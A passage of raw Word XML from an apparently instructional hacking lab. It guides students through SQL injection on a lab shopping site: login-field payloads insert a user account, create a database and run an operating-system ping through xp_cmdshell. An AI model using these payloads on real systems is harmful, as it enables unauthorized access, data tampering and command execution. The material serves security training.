        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
          <w:tab w:val="left" w:pos="2786"/>
          <w:tab w:val="left" w:pos="3424"/>
          <w:tab w:val="left" w:pos="4235"/>
          <w:tab w:val="left" w:pos="5140"/>
          <w:tab w:val="left" w:pos="5899"/>
          <w:tab w:val="left" w:pos="7495"/>
          <w:tab w:val="left" w:pos="8239"/>
          <w:tab w:val="left" w:pos="9117"/>
        </w:tabs>
        <w:ind w:left="2279" w:right="1438"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>blah’;insert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">values </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(‘nith’,‘pass123’);-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the username and login without any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-24"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717F089" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Did you manage to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>login?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C73633A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Let’s check: Login using your created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B28F66" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2279"/>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>You should successfully login. Browse and logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A34020A" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:right="1433"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform the Step 3 of this task to check if you have successfu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lly created user credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F0623" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Now, using this vulnerability, we shall try to create a database with SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DB31A7" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="380C8B57" w14:textId="05C23860" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15748608" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59414A23" wp14:editId="181F59BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>226695</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="21" name="Lin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DEBD187" id="Line 6" o:spid="_x0000_s1026" style="position:absolute;z-index:157486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from="54.65pt,17.85pt" to="595.3pt,1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oPaywEAAIMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L04MxOiMOD0k6y7Z&#10;FqDdBzCSbAuVRUFS4uTvR8lJ1m23oT4Iokg+Pj7Sq8fzYNhJ+aDRNnwxm3OmrECpbdfwny9Pnx44&#10;CxGsBINWNfyiAn9cf/ywGl2tSuzRSOUZgdhQj67hfYyuLoogejVAmKFTlpwt+gEimb4rpIeR0AdT&#10;lPN5VYzopfMoVAj0up2cfJ3x21aJ+KNtg4rMNJy4xXz6fB7SWaxXUHceXK/FlQb8B4sBtKWid6gt&#10;RGBHr/+BGrTwGLCNM4FDgW2rhco9UDeL+V/dPPfgVO6FxAnuLlN4P1jx/bT3TMuGlwvOLAw0o522&#10;ilVJmtGFmiI2du9Tc+Jsn90OxWtgFjc92E5lii8XR2mLlFH8kZKM4KjAYfyGkmLgGDHrdG79kCBJ&#10;AXbO47jcx6HOkQl6rB6qqlwuORM3XwH1LdH5EL8qHFi6NNwQ5wwMp12IiQjUt5BUx+KTNiZP21g2&#10;NvzzslzmhIBGy+RMYcF3h43x7ARpX/KXuyLP27CEvIXQT3HZNW2Sx6OVuUqvQH653iNoM92JlbFX&#10;lZIwk8QHlJe9v6lHk870r1uZVumtnbN//zvrXwAAAP//AwBQSwMEFAAGAAgAAAAhAFlHITfdAAAA&#10;CgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwkAQhu8mvsNmTLwQ2YVGlNItMWpvXkAJ16E7tg3d&#10;2dJdoPr0LvGgx3/myz/fZMvBtuJEvW8ca5iMFQji0pmGKw0f78XdIwgfkA22jknDF3lY5tdXGabG&#10;nXlFp3WoRCxhn6KGOoQuldKXNVn0Y9cRx92n6y2GGPtKmh7Psdy2cqrUTFpsOF6osaPnmsr9+mg1&#10;+GJDh+J7VI7UNqkcTQ8vb6+o9e3N8LQAEWgIfzBc9KM65NFp545svGhjVvMkohqS+wcQF2AyVzMQ&#10;u9+JzDP5/4X8BwAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJdSg9rLAQAAgwMAAA4AAAAA&#10;AAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAFlHITfdAAAACgEAAA8A&#10;AAAAAAAAAAAAAAAAJQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAvBQAAAAA=&#10;">
                <w10:wrap anchorx="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A60DF" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00D02F84">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1340" w:right="0" w:bottom="1300" w:left="600" w:header="708" w:footer="1119" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447323CD" w14:textId="29E82552" w:rsidR="00D02F84" w:rsidRDefault="00F83F1E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:spacing w:before="82"/>
        <w:ind w:right="1436"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="15749632" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38C611A2" wp14:editId="092D4CCE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>694055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>9727565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6866255" cy="0"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Lin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3CA2713" id="Line 5" o:spid="_x0000_s1026" style="position:absolute;z-index:157496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sKiygEAAIMDAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L04MOOiMOD0k6y7Z&#10;FqDdBzCSbAuVRUFS4uTvR8lJ1m23oT4Iokg+Pj7Sq8fzYNhJ+aDRNnwxm3OmrECpbdfwny9Pnx44&#10;CxGsBINWNfyiAn9cf/ywGl2tSuzRSOUZgdhQj67hfYyuLoogejVAmKFTlpwt+gEimb4rpIeR0AdT&#10;lPP5shjRS+dRqBDodTs5+Trjt60S8UfbBhWZaThxi/n0+Tyks1ivoO48uF6LKw34DxYDaEtF71Bb&#10;iMCOXv8DNWjhMWAbZwKHAttWC5V7oG4W87+6ee7BqdwLiRPcXabwfrDi+2nvmZYNL0keCwPNaKet&#10;YlWSZnShpoiN3fvUnDjbZ7dD8RqYxU0PtlOZ4svFUdoiZRR/pCQjOCpwGL+hpBg4Rsw6nVs/JEhS&#10;gJ3zOC73cahzZIIelw/LZVlVnImbr4D6luh8iF8VDixdGm6IcwaG0y7ERATqW0iqY/FJG5OnbSwb&#10;G/65KqucENBomZwpLPjusDGenSDtS/5yV+R5G5aQtxD6KS67pk3yeLQyV+kVyC/XewRtpjuxMvaq&#10;UhJmkviA8rL3N/Vo0pn+dSvTKr21c/bvf2f9CwAA//8DAFBLAwQUAAYACAAAACEArwkjpd8AAAAO&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPQU/DMAyF70j8h8hIXKYt6SomWppOCOiNCwO0a9aYtqJx&#10;uibbCr8e74Dg5mc/PX+vWE+uF0ccQ+dJQ7JQIJBqbztqNLy9VvNbECEasqb3hBq+MMC6vLwoTG79&#10;iV7wuImN4BAKudHQxjjkUoa6RWfCwg9IfPvwozOR5dhIO5oTh7teLpVaSWc64g+tGfChxfpzc3Aa&#10;QvWO++p7Vs/UNm08LvePz09G6+ur6f4ORMQp/pnhjM/oUDLTzh/IBtGzVlnKVh5u0iQDcbYkmVqB&#10;2P3uZFnI/zXKHwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCqusKiygEAAIMDAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQCvCSOl3wAAAA4BAAAP&#10;AAAAAAAAAAAAAAAAACQEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAMAUAAAAA&#10;">
                <w10:wrap anchorx="page" anchory="page"/>
              </v:line>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In the login page, type </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">blah’;create database mydb_sample; -- </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the username and login without any</w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D42908">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103152AE" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3DA391" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:left="1559" w:right="1435"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Perform the Step 3 of this task to check if you have successfully created database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB8E106" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1560"/>
        </w:tabs>
        <w:ind w:hanging="361"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Again, using this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vulnerability,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719D5381" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Type:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId33">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>http://www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B998223" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B223F60" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:right="1438"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">In the login page, type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>blah’;exec master..xp_cmdshell ‘ping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:u w:val="thick" w:color="0000FF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId34">
        <w:r>
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="thick" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.certifiedhacker.com</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:b/>
            <w:i/>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">–l 65000 –t’; -- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in the username and login without any password. [Here, you are executing a ping for the website using a SQL Injection query with the sent buffer size as –l and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>specified host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>–t]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE6045E" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2280"/>
        </w:tabs>
        <w:ind w:right="1436"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You could now see the difference. If the query is executed, (it should), you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>could see waiting for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId35">
        <w:r>
          <w:rPr>
            <w:color w:val="0000FF"/>
            <w:sz w:val="24"/>
            <w:u w:val="single" w:color="0000FF"/>
          </w:rPr>
          <w:t>www.goodshopping.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0242505C" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D02F84">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45119477" w14:textId="77777777" w:rsidR="00D02F84" w:rsidRDefault="00D42908">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1628"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:right="1436"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>confirm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>it,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>back</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-22"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2016,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-21"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>manager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
